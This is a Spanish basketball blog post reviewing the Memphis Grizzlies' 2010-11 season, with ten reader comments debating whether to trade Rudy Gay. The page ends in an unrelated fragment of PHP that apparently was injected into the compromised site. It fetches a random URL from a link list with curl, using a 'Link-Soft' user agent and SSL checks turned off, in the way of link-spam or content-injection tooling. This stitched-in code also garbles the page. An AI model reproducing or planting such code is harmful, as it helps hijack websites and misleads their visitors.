Memphis Grizzlies: Sobresaliente

15 de July de 2011 por txusma

No se puede decir cada día que hemos presenciado la mejor campaña de la historia de una franquicia pero este ha sido el caso de los Grizzlies. Primer partido ganado en playoffs y primera serie superada. Y eso que a mediados de febrero Rudy Gay, que estaba realizando una gran temporada, se lesionó de gravedad en el hombro, hecho que le causó ser baja el resto de la temporada. Las alarmas saltaron en Memphis, ya que la franquicia se hallaba en plena lucha por los Playoffs en el salvaje Oeste, pero la realidad es que tras la lesión de Gay los Grizzlies ganaron 16 de 26 partidos y consiguieron clasificarse como octavos. Posiblemente la llegada de Shane Battier a cambio de Hashem Tahbeet fue clave en este buen parcial.

En Playoffs, Memphis se convirtió en la cuarta franquicia en la historia capaz de eliminar al mejor equipo de su conferencia. Superó a San Antonio en prácticamente en todos los aspectos pero sobretodo en aquellos en los que hasta el momento habían destacado en la franquicia de Greg Popovich: Defensa, gran intensidad, fuerza mental… Y lo hicieron con unas Torres Gemelas como aquellas que formaban Robinson y Duncan. Zach Randolph y Marc Gasol se comieron al juego interior de los Spurs con cuchillo y tenedor. La actuación de Zach en la serie contra San Antonio fue para guardarla en vídeo y enseñársela a los niños, sobretodo la del último cuarto del último partido.

Tras esta victoria, los ositos plantaron cara a los Thunder y les llevaron al séptimo partido. Siempre les pesará el recuerdo del cuarto partido en el que cayeron después de 3 prórrogas y con el que podrían haberse puesto 3-1, un marcador difícilmente recuperable. De todas maneras, su temporada ha sido para enmarcar. Y lo mejor, es que si consiguen renovar a Marc Gasol, sus posibilidades de mejorarla crecerán enteros.

Lo mejor: La pareja interior, Zach Randolph y Marc Gasol, canela fina. La buena temporada de Mike Conley y la “sorpresa” de Tony Allen. La temporada de Rudy Gay hasta su lesión. El juego de equipo y la imagen ante los Spurs en Playoffs.

Lo peor: La lesión de de Rudy Gay a mitad de temporada. ¿Cómo habría sido la postemporada con él?

Jugando a GM

– Poquita cosa. Una vez renovado Zach Randolph la prioridad es renovar a Marc Gasol. Con estos dos jugadores, más Rudy Gay y Mike Conley, tenemos columna vertebral para tiempo.

– La única duda es qué hacer con OJ Mayo. Este año, y sobretodo en los Playoffs, ha demostrado que puede ser muy valioso para el equipo saliendo desde el banquillo. De todas maneras, su caché es alto y podría sacarse algo útil por él en el mercado. La prioridad es saber que opina él de su situación actual aunque yo no sería muy feliz si supiera que mi equipo me tenía traspasado (a  los Pacers) y que el movimiento no se llevó a cabo simplemente porque no se llegó a tiempo.

Comenta

10 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Voto por un cambio Igudala por Gay, los Ositos han demostrado que son mejores sin Gay, más equipo, más juego colectivo y eficaz.

    Renovar a Marc y deshacerse de Oj si hay algo interesante y de gay.

    Y más minutos para Battier que suele responder.

      Citar

  2. jas dice:
    #2

    Estoy contigo King, creo q seria un buen cambio Iguodala por Gay, a mi este ultimo me parece un jugador sobrevalorado. Yo tambien creo que Memphis juega mejor sin el.
    En cuanto a OJ solo me desaria de el si llega algo bastante interesante y si no intentar que se implique mas dandole mas minutos

      Citar

  3. Sempren dice:
    #3

    Bueno, recordad que Gay estaba haciendo una gran temporada, haciendo jugar al equipo, y asistiendo más que nunca en la liga. Aún así, son lógicas las dudas sobre su persona.

      Citar

  4. Txusma dice:
    #4

    Pero q gana Philadelphia en un cambio Iguodala x Gay? Si traspasan a Iggy supongo que es pq quieren abrir hueco para Evan Turner.

      Citar

  5. Txusma dice:
    #5

    De todas maneras yo le daría un voto de confianza…

      Citar

  6. safd dice:
    #6

    Memphis necesita a Gay, el claro ejemplo es la eliminatoria contra OKC, q les pararon bien a la pareja interior, necesitaban a gay q le da esa solvencia por fuera.

    No nos engañemos, q porq a los Spurs le hayan podido ganar sin el no significa nada. Con Gay alomejor hablabamos ahora de q fueron finalistas del oeste.

    Taparon un poco su ausencia porq les regalaron a Battier, pero ya no va a estar.

    Confiad en Gay.

      Citar

  7. safd dice:
    #7

    Memphis necesita a Gay, el claro ejemplo es la eliminatoria contra OKC, q les pararon bien a la pareja interior, necesitaban a gay q le da esa solvencia por fuera.

    No nos engañemos, q porq a los Spurs le hayan podido ganar sin el no significa nada. Con Gay alomejor hablabamos ahora de q fueron finalistas del oeste.

    Taparon un poco su ausencia porq les regalaron a Battier, pero ya no va a estar.

    Confiad en Gay.

      Citar

  8. jas dice:
    #8

    Si no recuerdo mal, hace dos años oi una estadistica, durante una retransmision, que decia que Gay era uno de los jugadores que menos asistencias daba por cada punto que metia en toda la liga. Este año no he seguido muxo a Memphis hasta los play-offs, Sempre dices que estaba repartiendo mas asistencias que nunca, eso ya no lo se, mi concepcion de el cambio un poco, pero como bien dices… la cabra siempre tira pa el monte.
    Sera muy buen anotador… pero creo q nada mas.

      Citar

  9. KB # 24 dice:
    #9

    Yo renovaría a Marc a casi cualquier precio (si la intención es seguir mejorando) y renovar a Battier por la mid-level o algo menos (no sé en que situación salarial están).
    Buscaría algún center con cara y ojos (Haddadi es más de circo que de NBA), creo que Vasquez puede ser otra vez un buen suplente de Conley Jr, le daría “otra” oportunidad a OJ de 6th man (suplente del perro de presa Allen), y en las alas Gay, Battier y Young. En la zona Zach y Marc con la ayuda de un nuevo center y de Arthur.

    Si esto se cumpliera quedaría un equipo de semis de conferencia seguro, y a partir de allí….soñar

      Citar

  10. Scriers dice:
    #10

    Bueno, yo me he estado fijando en ese apartado en Rudy Gay, uno de los grandes egoístas de la liga. Pero ha pasado de apenas dar 1 y poco por partido creo o algo así, a dar 2,8 por partido de media este año. Es una mejoría, si no abusiva, al menos considerable. Y jugando más o menos lo mismo.
    Así que bueno, yo también soy de los que creo que Gay hubiera mejorado a Memphis, le hubiera dado más mordiente y alternativas, pese a que tiene aún por madurar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>